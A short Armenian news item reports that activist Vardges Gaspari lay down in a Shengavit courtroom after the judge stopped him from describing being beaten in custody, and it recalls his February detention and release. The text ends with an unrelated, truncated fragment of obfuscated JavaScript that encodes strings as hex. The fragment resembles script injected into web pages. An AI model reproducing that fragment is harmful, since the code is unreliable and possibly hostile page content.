Գասպարին պառկեց նիստերի դահլիճում

18 total views, 1 views today

Շենգավիթ վարչական շրջանների ընդհանուր իրավասության դատարանում շարունակվում է քաղաքացիական ակտիվիստ Վարդգես Գասպարիի հերթական դատական նիստը: Դատական նիստի ժամանակ Գասպարին պատմեց, թե խցում իրեն ծեծի են ենթարկել, բռնություն կիրառել: Նախագահող դատավոր Նելլի Բաղդասարյանը, սակայն, Գասպարիին թույլ չտվեց ավարտել խոսքը: Գասպարին շարունակեց հայտարարությունը և դատավորը զգուշացում կիրառեց: Վարդգես Գասպարին կրկին պառկեց դատարանի դահլիճում:
Հիշեցնենք, որ Վարդգես Գասպարին փետրվարի 19-ին Շենգավիթ վարչական շրջանի ընդհանուր իրավասության դատարանի որոշմամբ կալանավորվել է, ապա փետրվարի 26-ին Վերաքննիչ քրեական դատարանի որոշմամբ` ազատ արձակվել:

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o